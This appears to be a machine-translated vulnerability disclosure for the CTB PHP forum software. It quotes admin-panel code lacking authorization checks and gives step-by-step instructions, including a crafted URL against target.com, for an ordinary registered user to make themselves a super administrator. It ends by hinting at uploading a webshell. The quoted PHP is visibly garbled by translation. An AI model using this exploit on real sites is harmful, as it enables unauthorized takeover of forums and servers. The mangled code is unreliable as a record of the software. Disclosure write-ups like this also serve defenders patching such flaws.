Beautiful but insecure ctb_php Foundation

>>>dedicated this scrap to caojing<<<

Involved version:
^^^^^^^
Currently all versions (now 1.3Alpha is the highest version)

Describe:
^^^^^^
CTB is a real easy digital <11cn.org>; development and maintenance of the source Code open PHP Forum. Because of the flaw in its background management file validation, it can cause illegal users to add a forum Super administrator directly, thereby threatening the forum or server security.

Specific:
^^^^
CTB writing is very normative, code orderly, pleasing, is indeed a graceful program, especially its functional modules, really let the younger brother learn a. But the security aspect is worrying:

Look at the following code:

/admin/main.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Getting a Get variable
if (Is_array ($_get)) {
foreach ($_get as $k => $v) {
if (Is_array ($_get[$k])) {
foreach ($_get[$k] as $k 2=> $v 2) {
$return [$k] [$k 2] = $v 2;
}
} else {
$return [$k] = $v;
}
}
}
...
$mod = isset ($_get[' mod ')? $_get[' mod ']: $_post[' mod ';
if (!file_exists ($mod.). PHP "{
$mod = "Mainright";
}
Require_once ($mod. ") PHP ";
//-----------------------------------------------------------------------------

Initializing class variables
$CTB = new Module;
$CTB->set = $set;
$CTB->tplpath = "./templates";
$CTB->input = $return;
$CTB->sess = isset ($_cookie["Sess_adminname"])? $_cookie: $_session;
$CTB->execute ();
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

There is no validation here, let's take a look at adding the admin file:

/admin/systemuser.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Class Module extends Commonclass
System Management Module Subclass
{
function Execute () {
Switch ($this->input[' action ']) {
...
Case ' Addsystemuser ':
$this->addsystemuser ();
Break
...
}
}

function Addsystemuser ()
{
Simple format of input data
$this->inputcheck ("Main.php?mod=systemuser&action=showsystemuser";
To perform an add operation
$this->file = ". /". $this->set[datapath]." /users/list.php ";
$systemLine = $this->select (4, $this->input[' systemusername '));
....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Still no verification, all the way smoothly Ah!

How to use:
^^^^^^^
Register a user first:

Landing Id:cat
User name: Dog
Password: ilikecat
Duplicate Password: ilikecat
Mailbox: cat@dog.com

Then submit the following URL:

Http://www.target.com/ctb/admin/main.php?mod=systemuser&systemUserName=dog&systemUserMode=1&action =addsystemuser

Haha, you are a super administrator now, do not believe? Submit the following URL background login:

Http://www.psych.com/ctb/admin/main.php?mod=login

Management Name: Cat
Admin Password: ilikecat

Hey... It's a success!

Do you want to change the background upload file type now and then upload Webshell? Hum, I guessed it ...

PostScript: Another found CTB code comments Some glaring typos, blot, hope can be amended together.